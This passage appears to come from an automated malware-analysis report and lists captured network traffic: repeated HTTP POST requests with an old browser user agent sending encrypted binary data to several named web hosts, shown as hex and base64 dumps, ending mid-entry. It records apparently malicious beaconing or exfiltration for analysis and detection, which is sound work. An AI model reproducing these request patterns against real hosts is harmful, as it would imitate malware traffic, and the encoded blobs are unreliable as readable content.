uSlORSWhapQwqXvVzOCq/p7UtSZzW7WcKVhDaom/7Vpql+tIiLoznmAOoVq0m89whE47W7mjxZUeI98m6MoiLSrHMhr3dIva6U69twTpmeb7GvP8yuBf3dNq5/asGMFuonA4D56cyhfsVfBSPmo2+JpMOWJCnlnvTX8E9vgCFvYljz9u/UBdL02dZJQTYw+SZ0YU+b4caW2GMdMHwARfLjrneXZUBE1uAWK8u/gtcGwMCCc9S2QmyWjJMScZnxzxCAA2QOVt5bkkXPkltWY6R9bxJonYzaLTvW2avN/uvxgytwM9ls5uTF3Y+ABki2hEG+e3ZavG6Dg5Cmc+NOomtHZbCuSaFZbksMCKQBchZff6bjDkCI2Hp4JznilZvRT3iHYt/70zFob/EPpcTkqWB+5pSIGzsoIpBC+LOXT3/ruBvEv6CUp9XKNLi0SRWzKMGDzdnQjwTVykz4VHmqR9CaHbosHThJGqu1BL84Y62ntHRUwcdhJk66cIeA9ah45nAZ2dx0s8yvvmSQ11mPulmI1aUMNjaT9OVUC+UHPvCYSwjQ6z+00wiPRPmnZSzfJUDzgSu7dlag==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 55 6f 30 57 4c 5a 47 48 59 5a 54 57 57 4b 74 75 4d 4a 75 50 33 75 72 42 49 76 64 50 34 44 58 46 56 56 63 54 35 4a 78 73 6a 65 63 73 4c 56 30 6d 36 73 56 55 4e 6f 34 73 38 75 62 67 45 32 54 33 48 59 48 4f 72 6c 34 31 4f 36 62 69 74 76 66 6e 58 75 6d 6e 30 56 72 53 75 48 79 36 2b 68 79 4a 53 73 45 73 66 4a 4f 31 65 52 4e 66 31 42 4d 32 62 67 52 32 59 43 55 39 43 51 65 6e 47 47 42 65 6f 32 72 30 55 50 54 53 76 75 39 43 44 6c 38 6d 69 73 65 53 53 42 58 32 4b 34 34 2b 58 37 63 78 75 5a 62 39 54 45 72 2f 30 63 6a 6e 30 36 57 52 46 67 43 2f 79 48 6d 6e 6b 4f 50 5a 4b 5a 31 31 37 4f 34 58 55 67 30 70 4f 59 4a 30 2f 68 35 5a 71 52 62 6f 51 5a 47 76 38 77 64 67 45 44 50 77 54 2f 4e 41 79 49 53 71 55 77 69 43 65 73 43 78 68 69 53 6d 54 42 4f 2b 64 6f 65 35 46 6e 68 6f 33 54 74 2b 74 51 39 67 7a 7a 79 68 73 38 59 44 57 52 55 63 79 71 37 66 36 36 55 4c 63 4b 53 38 72 2b 77 54 69 73 44 6f 54 54 6e 6e 4f 55 68 7a 6b 64 38 67 6f 4f 4e 71 4c 71 45 6e 57 33 6c 53 35 30 62 74 67 6b 4d 48 69 32 4c 75 70 69 4a 35 2b 49 64 6c 42 6a 4b 6d 63 73 31 59 66 72 72 33 31 33 39 42 4b 31 67 41 74 73 6d 4d 42 63 2f 56 49 6d 36 61 43 65 5a 4f 6a 59 79 68 6c 43 76 4c 78 37 45 62 57 39 58 64 43 71 2b 70 35 4c 4e 73 50 68 58 65 4a 30 53 50 33 64 72 75 34 6e 74 59 32 7a 66 71 6e 5a 50 77 63 36 69 6d 61 7a 56 71 6c 58 39 66 50 4a 58 34 4e 4f 38 43 4e 39 47 43 62 64 51 49 77 62 2b 53 72 46 65 76 6a 77 59 4f 57 64 4d 33 4f 31 71 41 62 52 58 47 5a 72 75 6f 62 73 5a 6d 46 69 30 71 78 35 72 44 41 58 61 59 30 55 30 70 38 74 48 33 32 44 47 37 64 74 79 30 56 54 34 73 66 47 6a 43 70 32 43 33 37 68 4e 54 47 4a 52 68 6d 4d 67 45 37 67 55 6d 4f 4b 53 6c 4c 61 42 6f 47 48 6e 44 2b 37 6b 3d Data Ascii: Uo0WLZGHYZTWWKtuMJuP3urBIvdP4DXFVVcT5JxsjecsLV0m6sVUNo4s8ubgE2T3HYHOrl41O6bitvfnXumn0VrSuHy6+hyJSsEsfJO1eRNf1BM2bgR2YCU9CQenGGBeo2r0UPTSvu9CDl8miseSSBX2K44+X7cxuZb9TEr/0cjn06WRFgC/yHmnkOPZKZ117O4XUg0pOYJ0/h5ZqRboQZGv8wdgEDPwT/NAyISqUwiCesCxhiSmTBO+doe5Fnho3Tt+tQ9gzzyhs8YDWRUcyq7f66ULcKS8r+wTisDoTTnnOUhzkd8goONqLqEnW3lS50btgkMHi2LupiJ5+IdlBjKmcs1Yfrr3139BK1gAtsmMBc/VIm6aCeZOjYyhlCvLx7EbW9XdCq+p5LNsPhXeJ0SP3dru4ntY2zfqnZPwc6imazVqlX9fPJX4NO8CN9GCbdQIwb+SrFevjwYOWdM3O1qAbRXGZruobsZmFi0qx5rDAXaY0U0p8tH32DG7dty0VT4sfGjCp2C37hNTGJRhmMgE7gUmOKSlLaBoGHnD+7k=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 2b 42 79 6d 45 6c 34 4b 34 73 7a 43 2b 47 30 75 71 65 34 34 74 30 48 4c 30 6e 71 65 77 35 49 63 63 71 44 4b 34 72 55 52 78 36 6d 55 67 4f 2b 72 47 72 45 57 32 59 6c 6e 48 76 42 5a 57 73 6a 35 47 6f 4b 33 52 37 51 38 36 44 70 39 6b 64 6b 31 39 6b 4b 30 58 45 62 2b 72 37 6b 43 6d 71 6e 56 56 4e 67 7a 43 56 51 46 4b 48 58 4a 59 37 5a 66 6a 62 4c 59 4c 51 57 58 52 54 39 4c 66 59 4f 53 64 42 4f 2f 58 77 43 37 2b 6f 31 64 65 61 78 77 6c 6c 74 45 66 43 69 79 68 37 42 49 38 71 2f 4e 42 34 4e 6c 2b 43 47 5a 4e 72 62 45 48 4f 76 51 4f 69 61 6e 73 76 78 6a 48 66 44 4e 35 35 4c 43 6e 68 36 59 75 77 46 39 49 6e 6e 6c 6f 4c 78 50 49 6c 56 41 6c 78 70 76 43 6d 71 2f 65 32 34 45 7a 51 30 4f 55 76 34 4a 39 4c 50 4c 69 6b 4c 79 48 45 54 45 2b 34 71 41 46 56 67 70 62 2f 58 37 35 35 7a 38 73 32 56 77 52 6e 73 2b 6b 72 6f 68 46 51 4f 65 73 65 73 72 42 41 2f 54 72 49 49 6b 64 69 46 65 38 53 2f 4b 58 50 41 79 73 50 31 7a 33 30 62 42 62 4a 53 75 42 48 68 39 59 52 49 43 54 56 68 5a 33 41 4f 73 68 54 4a 58 7a 70 49 63 77 6c 51 6c 43 35 78 64 57 51 2f 76 61 4e 32 63 50 52 64 66 74 57 35 44 64 38 57 30 68 34 68 56 5a 64 75 77 76 57 31 78 47 45 59 71 63 35 79 61 6f 50 34 34 54 46 79 6a 53 72 65 33 69 54 55 32 6b 31 65 76 34 59 45 62 33 78 5a 43 34 78 6e 62 2f 36 31 77 45 32 55 48 64 56 63 78 66 4e 77 57 2b 32 34 4a 73 49 32 38 43 69 64 73 47 32 35 33 6f 75 50 4f 51 50 50 4c 4a 70 77 4d 51 49 41 41 7a 69 68 67 70 6d 4b 63 43 68 39 2f 4a 38 4d 53 30 4d 2f 4c 4c 37 43 53 71 4b 2f 44 6e 32 61 31 74 41 57 44 4a 45 46 4d 2f 7a 31 52 51 7a 38 6a 4e 57 58 43 46 74 39 36 73 37 51 6d Data Ascii: +BymEl4K4szC+G0uqe44t0HL0nqew5IccqDK4rURx6mUgO+rGrEW2YlnHvBZWsj5GoK3R7Q86Dp9kdk19kK0XEb+r7kCmqnVVNgzCVQFKHXJY7ZfjbLYLQWXRT9LfYOSdBO/XwC7+o1deaxwlltEfCiyh7BI8q/NB4Nl+CGZNrbEHOvQOiansvxjHfDN55LCnh6YuwF9InnloLxPIlVAlxpvCmq/e24EzQ0OUv4J9LPLikLyHETE+4qAFVgpb/X755z8s2VwRns+krohFQOesesrBA/TrIIkdiFe8S/KXPAysP1z30bBbJSuBHh9YRICTVhZ3AOshTJXzpIcwlQlC5xdWQ/vaN2cPRdftW5Dd8W0h4hVZduwvW1xGEYqc5yaoP44TFyjSre3iTU2k1ev4YEb3xZC4xnb/61wE2UHdVcxfNwW+24JsI28CidsG253ouPOQPPLJpwMQIAAzihgpmKcCh9/J8MS0M/LL7CSqK/Dn2a1tAWDJEFM/z1RQz8jNWXCFt96s7Qm
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 65 35 32 65 32 65 77 68 5a 35 54 72 38 73 45 59 31 37 51 37 4c 66 39 66 4e 75 39 45 68 58 49 35 34 4e 6d 4c 48 56 36 46 75 30 56 31 4a 6c 68 4f 57 6b 37 44 38 4b 39 36 70 43 4e 75 52 6e 75 46 38 47 6c 37 34 31 6f 34 4f 53 43 33 47 63 59 73 38 7a 47 78 65 6f 39 68 41 41 53 49 4d 66 64 55 76 4a 42 47 46 41 7a 52 66 2f 42 45 4f 30 6d 59 68 65 45 68 34 57 30 52 5a 57 43 48 63 69 73 54 71 38 33 32 69 6e 68 32 31 4d 5a 58 4c 58 70 36 5a 58 4a 44 6f 69 35 79 42 48 6e 2f 31 7a 75 56 69 69 77 6c 65 67 73 66 57 4e 49 52 67 79 68 30 59 6c 6b 63 49 59 4d 4a 31 4c 51 61 38 4c 6b 36 77 48 32 48 4b 53 63 6b 59 77 46 68 47 70 79 4d 6c 55 42 4f 4e 34 30 64 7a 6a 6c 43 71 52 4e 70 73 4c 51 75 6a 31 79 6b 64 5a 50 75 36 2b 39 62 66 44 65 65 67 74 59 4c 6d 58 42 42 2f 4f 66 70 67 31 75 4f 44 79 62 32 4b 70 58 41 51 73 46 35 74 30 43 53 61 71 38 73 61 48 45 6c 36 48 62 56 65 69 77 6d 74 57 42 53 78 34 41 47 32 51 61 54 5a 72 61 35 66 71 66 53 37 49 48 6b 49 62 57 6a 5a 4c 4f 78 34 6b 70 49 47 63 37 71 59 7a 66 69 4f 65 6f 6b 7a 6b 53 64 34 33 4a 6b 58 43 2f 64 5a 7a 4e 34 67 4f 58 5a 43 44 49 70 32 44 76 48 68 69 6d 4b 79 46 43 56 41 6a 38 76 6e 4a 46 39 4d 59 6d 6a 2b 37 52 44 42 30 6e 51 58 35 74 51 78 47 46 61 52 36 75 52 35 48 2b 6b 38 45 32 58 71 6f 49 77 65 51 77 61 4a 42 68 45 2b 6e 52 6f 51 6e 6a 76 38 78 6d 76 4c 7a 37 4e 4c 6f 54 54 58 55 4d 56 4c 6a 4c 65 4d 78 35 75 63 32 6d 64 43 56 53 51 65 37 4b 7a 32 36 30 5a 31 37 70 33 35 67 72 52 43 56 38 32 4f 6d 67 65 69 52 58 57 61 6c 5a 51 39 68 65 31 52 35 56 69 33 35 5a 64 6a 51 62 62 55 42 72 67 65 37 58 77 6c 44 74 74 79 66 4d 50 43 72 37 67 56 77 31 38 45 72 43 39 39 2f 51 3d Data Ascii: e52e2ewhZ5Tr8sEY17Q7Lf9fNu9EhXI54NmLHV6Fu0V1JlhOWk7D8K96pCNuRnuF8Gl741o4OSC3GcYs8zGxeo9hAASIMfdUvJBGFAzRf/BEO0mYheEh4W0RZWCHcisTq832inh21MZXLXp6ZXJDoi5yBHn/1zuViiwlegsfWNIRgyh0YlkcIYMJ1LQa8Lk6wH2HKSckYwFhGpyMlUBON40dzjlCqRNpsLQuj1ykdZPu6+9bfDeegtYLmXBB/Ofpg1uODyb2KpXAQsF5t0CSaq8saHEl6HbVeiwmtWBSx4AG2QaTZra5fqfS7IHkIbWjZLOx4kpIGc7qYzfiOeokzkSd43JkXC/dZzN4gOXZCDIp2DvHhimKyFCVAj8vnJF9MYmj+7RDB0nQX5tQxGFaR6uR5H+k8E2XqoIweQwaJBhE+nRoQnjv8xmvLz7NLoTTXUMVLjLeMx5uc2mdCVSQe7Kz260Z17p35grRCV82OmgeiRXWalZQ9he1R5Vi35ZdjQbbUBrge7XwlDttyfMPCr7gVw18ErC99/Q=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 75 53 6c 4f 52 53 57 68 61 70 51 77 71 58 76 56 7a 4f 43 71 2f 70 37 55 74 53 5a 7a 57 37 57 63 4b 56 68 44 61 6f 6d 2f 37 56 70 71 6c 2b 74 49 69 4c 6f 7a 6e 6d 41 4f 6f 56 71 30 6d 38 39 77 68 45 34 37 57 37 6d 6a 78 5a 55 65 49 39 38 6d 36 4d 6f 69 4c 53 72 48 4d 68 72 33 64 49 76 61 36 55 36 39 74 77 54 70 6d 65 62 37 47 76 50 38 79 75 42 66 33 64 4e 71 35 2f 61 73 47 4d 46 75 6f 6e 41 34 44 35 36 63 79 68 66 73 56 66 42 53 50 6d 6f 32 2b 4a 70 4d 4f 57 4a 43 6e 6c 6e 76 54 58 38 45 39 76 67 43 46 76 59 6c 6a 7a 39 75 2f 55 42 64 4c 30 32 64 5a 4a 51 54 59 77 2b 53 5a 30 59 55 2b 62 34 63 61 57 32 47 4d 64 4d 48 77 41 52 66 4c 6a 72 6e 65 58 5a 55 42 45 31 75 41 57 4b 38 75 2f 67 74 63 47 77 4d 43 43 63 39 53 32 51 6d 79 57 6a 4a 4d 53 63 5a 6e 78 7a 78 43 41 41 32 51 4f 56 74 35 62 6b 6b 58 50 6b 6c 74 57 59 36 52 39 62 78 4a 6f 6e 59 7a 61 4c 54 76 57 32 61 76 4e 2f 75 76 78 67 79 74 77 4d 39 6c 73 35 75 54 46 33 59 2b 41 42 6b 69 32 68 45 47 2b 65 33 5a 61 76 47 36 44 67 35 43 6d 63 2b 4e 4f 6f 6d 74 48 5a 62 43 75 53 61 46 5a 62 6b 73 4d 43 4b 51 42 63 68 5a 66 66 36 62 6a 44 6b 43 49 32 48 70 34 4a 7a 6e 69 6c 5a 76 52 54 33 69 48 59 74 2f 37 30 7a 46 6f 62 2f 45 50 70 63 54 6b 71 57 42 2b 35 70 53 49 47 7a 73 6f 49 70 42 43 2b 4c 4f 58 54 33 2f 72 75 42 76 45 76 36 43 55 70 39 58 4b 4e 4c 69 30 53 52 57 7a 4b 4d 47 44 7a 64 6e 51 6a 77 54 56 79 6b 7a 34 56 48 6d 71 52 39 43 61 48 62 6f 73 48 54 68 4a 47 71 75 31 42 4c 38 34 59 36 32 6e 74 48 52 55 77 63 64 68 4a 6b 36 36 63 49 65 41 39 61 68 34 35 6e 41 5a 32 64 78 30 73 38 79 76 76 6d 53 51 31 31 6d 50 75 6c 6d 49 31 61 55 4d 4e 6a 61 54 39 4f 56 55 43 2b 55 48 50 76 43 59 53 77 6a 51 36 7a 2b 30 30 77 69 50 52 50 6d 6e 5a 53 7a 66 4a 55 44 7a 67 53 75 37 64 6c 61 67 3d 3d Data Ascii: uSlORSWhapQwqXvVzOCq/p7UtSZzW7WcKVhDaom/7Vpql+tIiLoznmAOoVq0m89whE47W7mjxZUeI98m6MoiLSrHMhr3dIva6U69twTpmeb7GvP8yuBf3dNq5/asGMFuonA4D56cyhfsVfBSPmo2+JpMOWJCnlnvTX8E9vgCFvYljz9u/UBdL02dZJQTYw+SZ0YU+b4caW2GMdMHwARfLjrneXZUBE1uAWK8u/gtcGwMCCc9S2QmyWjJMScZnxzxCAA2QOVt5bkkXPkltWY6R9bxJonYzaLTvW2avN/uvxgytwM9ls5uTF3Y+ABki2hEG+e3ZavG6Dg5Cmc+NOomtHZbCuSaFZbksMCKQBchZff6bjDkCI2Hp4JznilZvRT3iHYt/70zFob/EPpcTkqWB+5pSIGzsoIpBC+LOXT3/ruBvEv6CUp9XKNLi0SRWzKMGDzdnQjwTVykz4VHmqR9CaHbosHThJGqu1BL84Y62ntHRUwcdhJk66cIeA9ah45nAZ2dx0s8yvvmSQ11mPulmI1aUMNjaT9OVUC+UHPvCYSwjQ6z+00wiPRPmnZSzfJUDzgSu7dlag==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 55 6f 30 57 4c 5a 47 48 59 5a 54 57 57 4b 74 75 4d 4a 75 50 33 75 72 42 49 76 64 50 34 44 58 46 56 56 63 54 35 4a 78 73 6a 65 63 73 4c 56 30 6d 36 73 56 55 4e 6f 34 73 38 75 62 67 45 32 54 33 48 59 48 4f 72 6c 34 31 4f 36 62 69 74 76 66 6e 58 75 6d 6e 30 56 72 53 75 48 79 36 2b 68 79 4a 53 73 45 73 66 4a 4f 31 65 52 4e 66 31 42 4d 32 62 67 52 32 59 43 55 39 43 51 65 6e 47 47 42 65 6f 32 72 30 55 50 54 53 76 75 39 43 44 6c 38 6d 69 73 65 53 53 42 58 32 4b 34 34 2b 58 37 63 78 75 5a 62 39 54 45 72 2f 30 63 6a 6e 30 36 57 52 46 67 43 2f 79 48 6d 6e 6b 4f 50 5a 4b 5a 31 31 37 4f 34 58 55 67 30 70 4f 59 4a 30 2f 68 35 5a 71 52 62 6f 51 5a 47 76 38 77 64 67 45 44 50 77 54 2f 4e 41 79 49 53 71 55 77 69 43 65 73 43 78 68 69 53 6d 54 42 4f 2b 64 6f 65 35 46 6e 68 6f 33 54 74 2b 74 51 39 67 7a 7a 79 68 73 38 59 44 57 52 55 63 79 71 37 66 36 36 55 4c 63 4b 53 38 72 2b 77 54 69 73 44 6f 54 54 6e 6e 4f 55 68 7a 6b 64 38 67 6f 4f 4e 71 4c 71 45 6e 57 33 6c 53 35 30 62 74 67 6b 4d 48 69 32 4c 75 70 69 4a 35 2b 49 64 6c 42 6a 4b 6d 63 73 31 59 66 72 72 33 31 33 39 42 4b 31 67 41 74 73 6d 4d 42 63 2f 56 49 6d 36 61 43 65 5a 4f 6a 59 79 68 6c 43 76 4c 78 37 45 62 57 39 58 64 43 71 2b 70 35 4c 4e 73 50 68 58 65 4a 30 53 50 33 64 72 75 34 6e 74 59 32 7a 66 71 6e 5a 50 77 63 36 69 6d 61 7a 56 71 6c 58 39 66 50 4a 58 34 4e 4f 38 43 4e 39 47 43 62 64 51 49 77 62 2b 53 72 46 65 76 6a 77 59 4f 57 64 4d 33 4f 31 71 41 62 52 58 47 5a 72 75 6f 62 73 5a 6d 46 69 30 71 78 35 72 44 41 58 61 59 30 55 30 70 38 74 48 33 32 44 47 37 64 74 79 30 56 54 34 73 66 47 6a 43 70 32 43 33 37 68 4e 54 47 4a 52 68 6d 4d 67 45 37 67 55 6d 4f 4b 53 6c 4c 61 42 6f 47 48 6e 44 2b 37 6b 3d Data Ascii: Uo0WLZGHYZTWWKtuMJuP3urBIvdP4DXFVVcT5JxsjecsLV0m6sVUNo4s8ubgE2T3HYHOrl41O6bitvfnXumn0VrSuHy6+hyJSsEsfJO1eRNf1BM2bgR2YCU9CQenGGBeo2r0UPTSvu9CDl8miseSSBX2K44+X7cxuZb9TEr/0cjn06WRFgC/yHmnkOPZKZ117O4XUg0pOYJ0/h5ZqRboQZGv8wdgEDPwT/NAyISqUwiCesCxhiSmTBO+doe5Fnho3Tt+tQ9gzzyhs8YDWRUcyq7f66ULcKS8r+wTisDoTTnnOUhzkd8goONqLqEnW3lS50btgkMHi2LupiJ5+IdlBjKmcs1Yfrr3139BK1gAtsmMBc/VIm6aCeZOjYyhlCvLx7EbW9XdCq+p5LNsPhXeJ0SP3dru4ntY2zfqnZPwc6imazVqlX9fPJX4NO8CN9GCbdQIwb+SrFevjwYOWdM3O1qAbRXGZruobsZmFi0qx5rDAXaY0U0p8tH32DG7dty0VT4sfGjCp2C37hNTGJRhmMgE7gUmOKSlLaBoGHnD+7k=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 53 79 4e 54 72 46 79 70 5a 5a 52 67 48 67 64 4c 68 7a 55 50 30 65 38 45 61 68 64 30 53 64 4a 59 55 4f 44 63 76 50 69 34 57 61 47 54 54 36 67 64 74 48 6a 59 2b 6c 4a 4d 44 79 47 7a 44 4e 4f 43 4f 4c 4e 49 56 47 30 79 52 59 4d 46 73 32 79 31 46 6b 66 4a 6f 48 6f 6d 78 47 6d 7a 54 50 33 6f 34 4a 58 44 6e 4e 34 31 6a 51 77 39 6d 35 44 4f 78 65 70 62 76 4e 77 56 6c 38 42 4a 54 62 69 36 66 68 66 50 55 2b 6d 4f 30 4e 4a 5a 75 44 41 70 6a 53 54 57 68 36 79 68 39 36 70 41 5a 49 4d 42 58 42 6a 58 67 6c 4e 63 7a 6d 51 6a 78 63 65 62 39 51 6c 73 76 52 37 4a 32 67 54 2f 2f 6b 53 52 31 56 63 70 66 44 54 35 77 42 54 4e 59 6d 72 56 31 35 6d 73 58 79 2b 38 76 79 4d 52 70 4f 79 72 75 37 62 33 2b 62 6e 62 43 33 68 73 70 57 55 76 4f 68 36 42 79 6a 34 49 2f 54 54 45 2b 52 46 33 4c 74 72 76 65 52 6b 73 55 62 31 4d 44 54 72 78 42 37 4c 31 36 6b 37 62 39 71 53 30 48 65 7a 7a 7a 4c 76 2f 2f 32 44 64 4e 74 35 71 6a 30 4e 69 58 39 50 58 78 6e 56 30 39 69 35 50 49 50 47 2b 67 72 36 6f 76 7a 69 4d 48 52 6e 7a 48 6c 58 2f 4d 7a 39 59 68 4c 76 63 63 6a 6c 30 4f 69 50 65 77 4b 77 30 67 6a 34 70 37 6f 45 75 56 44 36 62 64 77 57 62 72 50 42 2b 59 4f 61 62 4d 66 48 5a 44 62 52 65 65 50 53 6d 57 64 52 32 46 39 64 54 47 61 6f 4e 59 51 45 74 50 72 5a 2f 4e 61 5a 75 48 56 5a 42 46 47 6e 2f 73 58 70 50 53 4d 4a 51 6b 42 35 4d 46 45 6b 55 73 2b 76 33 64 30 37 37 65 33 47 63 52 52 4d 4e 39 32 6b 49 6c 53 6f 47 38 7a 53 73 4c 62 34 66 44 52 67 4a 45 53 32 45 6a 52 46 79 51 4a 75 74 63 71 6f 35 66 37 54 53 46 61 4d 64 4d 71 66 4f 37 35 4b 36 57 51 52 76 51 30 44 7a 61 4c 6c 52 54 2f 6e 4c 4a 54 48 2f 31 2f 67 4d 37 57 49 4b 35 5a 4a 74 7a 76 79 77 49 36 6e 6a 6d 52 76 67 66 4b 65 6c 31 64 6a 39 6d 57 4c 34 53 48 55 54 70 4c 56 2f Data Ascii: SyNTrFypZZRgHgdLhzUP0e8Eahd0SdJYUODcvPi4WaGTT6gdtHjY+lJMDyGzDNOCOLNIVG0yRYMFs2y1FkfJoHomxGmzTP3o4JXDnN41jQw9m5DOxepbvNwVl8BJTbi6fhfPU+mO0NJZuDApjSTWh6yh96pAZIMBXBjXglNczmQjxceb9QlsvR7J2gT//kSR1VcpfDT5wBTNYmrV15msXy+8vyMRpOyru7b3+bnbC3hspWUvOh6Byj4I/TTE+RF3LtrveRksUb1MDTrxB7L16k7b9qS0HezzzLv//2DdNt5qj0NiX9PXxnV09i5PIPG+gr6ovziMHRnzHlX/Mz9YhLvccjl0OiPewKw0gj4p7oEuVD6bdwWbrPB+YOabMfHZDbReePSmWdR2F9dTGaoNYQEtPrZ/NaZuHVZBFGn/sXpPSMJQkB5MFEkUs+v3d077e3GcRRMN92kIlSoG8zSsLb4fDRgJES2EjRFyQJutcqo5f7TSFaMdMqfO75K6WQRvQ0DzaLlRT/nLJTH/1/gM7WIK5ZJtzvywI6njmRvgfKel1dj9mWL4SHUTpLV/
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 48 73 4a 64 64 65 2b 41 64 4a 51 52 73 69 58 6f 44 72 6b 50 79 66 67 6f 31 39 4d 46 4d 4d 7a 72 6b 36 64 46 4f 64 39 73 52 43 52 79 42 30 68 71 44 6a 57 53 30 54 39 6f 58 53 62 49 4e 59 62 43 50 52 43 56 78 57 75 6d 67 41 4f 6b 45 34 37 5a 5a 2b 4d 79 63 64 57 55 46 7a 68 63 64 56 71 58 46 6b 72 7a 47 34 76 64 56 76 35 67 6f 4d 56 7a 66 2f 2b 61 45 77 4f 54 57 49 54 54 67 53 6c 5a 55 44 61 44 78 4a 49 6e 52 59 49 36 72 30 4b 66 4f 30 65 37 38 77 5a 70 61 42 6d 2b 7a 2b 6e 48 77 2f 6e 67 4d 6d 4d 6f 32 73 4d 64 32 4e 4b 33 75 43 4c 45 39 5a 4e 73 76 56 2b 77 31 72 49 45 78 39 48 4b 47 38 62 61 35 38 4c 46 6e 31 30 4c 4b 79 7a 70 6b 42 4e 35 64 78 71 69 33 53 62 4d 34 32 70 66 46 38 69 33 52 54 72 65 46 57 39 4f 6c 4f 43 34 37 52 79 67 2f 61 77 63 67 31 44 46 2b 4d 6f 75 43 34 2f 55 71 64 56 63 6b 52 36 73 76 44 62 79 44 78 52 6d 77 6e 4f 58 6a 47 32 70 2f 51 50 46 5a 37 31 77 62 32 47 37 44 43 66 6e 78 36 68 38 71 6b 50 2b 6f 58 4b 66 75 67 4a 4b 6a 36 45 56 5a 58 36 6b 43 38 51 58 4f 51 4d 4d 4c 44 56 79 69 78 58 50 68 62 58 32 47 2f 4a 64 47 41 48 62 58 69 66 4e 67 52 48 68 34 33 79 66 48 38 35 4e 6b 72 2b 30 37 4f 34 71 76 4a 35 36 4c 68 50 2b 2b 45 4f 41 67 6f 51 34 6e 58 5a 4c 63 74 6b 48 4e 69 70 2b 36 32 56 62 68 45 37 78 70 4b 75 59 36 30 39 4d 4b 64 35 52 52 30 31 6a 64 71 61 41 6d 48 71 6c 68 47 2b 69 4b 49 45 73 68 4a 6d 5a 77 63 2b 63 53 38 57 49 46 39 36 66 52 44 42 2b 55 62 77 43 65 58 55 6d 79 4c 54 36 37 71 70 42 51 33 73 4f 63 4d 55 4b 2f 48 52 71 4b 75 61 50 79 69 35 30 55 72 49 48 76 36 47 76 6b 67 73 41 55 6f 34 47 71 30 64 36 7a 39 38 75 59 61 50 59 66 35 30 71 33 6a 6f 44 61 51 43 75 4e 78 53 68 35 48 51 6a 75 51 3d 3d Data Ascii: HsJdde+AdJQRsiXoDrkPyfgo19MFMMzrk6dFOd9sRCRyB0hqDjWS0T9oXSbINYbCPRCVxWumgAOkE47ZZ+MycdWUFzhcdVqXFkrzG4vdVv5goMVzf/+aEwOTWITTgSlZUDaDxJInRYI6r0KfO0e78wZpaBm+z+nHw/ngMmMo2sMd2NK3uCLE9ZNsvV+w1rIEx9HKG8ba58LFn10LKyzpkBN5dxqi3SbM42pfF8i3RTreFW9OlOC47Ryg/awcg1DF+MouC4/UqdVckR6svDbyDxRmwnOXjG2p/QPFZ71wb2G7DCfnx6h8qkP+oXKfugJKj6EVZX6kC8QXOQMMLDVyixXPhbX2G/JdGAHbXifNgRHh43yfH85Nkr+07O4qvJ56LhP++EOAgoQ4nXZLctkHNip+62VbhE7xpKuY609MKd5RR01jdqaAmHqlhG+iKIEshJmZwc+cS8WIF96fRDB+UbwCeXUmyLT67qpBQ3sOcMUK/HRqKuaPyi50UrIHv6GvkgsAUo4Gq0d6z98uYaPYf50q3joDaQCuNxSh5HQjuQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 55 6f 30 57 4c 5a 47 48 59 5a 54 57 57 4b 74 75 4d 4a 75 50 33 75 72 42 49 76 64 50 34 44 58 46 56 56 63 54 35 4a 78 73 6a 65 63 73 4c 56 30 6d 36 73 56 55 4e 6f 34 73 38 75 62 67 45 32 54 33 48 59 48 4f 72 6c 34 31 4f 36 62 69 74 76 66 6e 58 75 6d 6e 30 56 72 53 75 48 79 36 2b 68 79 4a 53 73 45 73 66 4a 4f 31 65 52 4e 66 31 42 4d 32 62 67 52 32 59 43 55 39 43 51 65 6e 47 47 42 65 6f 32 72 30 55 50 54 53 76 75 39 43 44 6c 38 6d 69 73 65 53 53 42 58 32 4b 34 34 2b 58 37 63 78 75 5a 62 39 54 45 72 2f 30 63 6a 6e 30 36 57 52 46 67 43 2f 79 48 6d 6e 6b 4f 50 5a 4b 5a 31 31 37 4f 34 58 55 67 30 70 4f 59 4a 30 2f 68 35 5a 71 52 62 6f 51 5a 47 76 38 77 64 67 45 44 50 77 54 2f 4e 41 79 49 53 71 55 77 69 43 65 73 43 78 68 69 53 6d 54 42 4f 2b 64 6f 65 35 46 6e 68 6f 33 54 74 2b 74 51 39 67 7a 7a 79 68 73 38 59 44 57 52 55 63 79 71 37 66 36 36 55 4c 63 4b 53 38 72 2b 77 54 69 73 44 6f 54 54 6e 6e 4f 55 68 7a 6b 64 38 67 6f 4f 4e 71 4c 71 45 6e 57 33 6c 53 35 30 62 74 67 6b 4d 48 69 32 4c 75 70 69 4a 35 2b 49 64 6c 42 6a 4b 6d 63 73 31 59 66 72 72 33 31 33 39 42 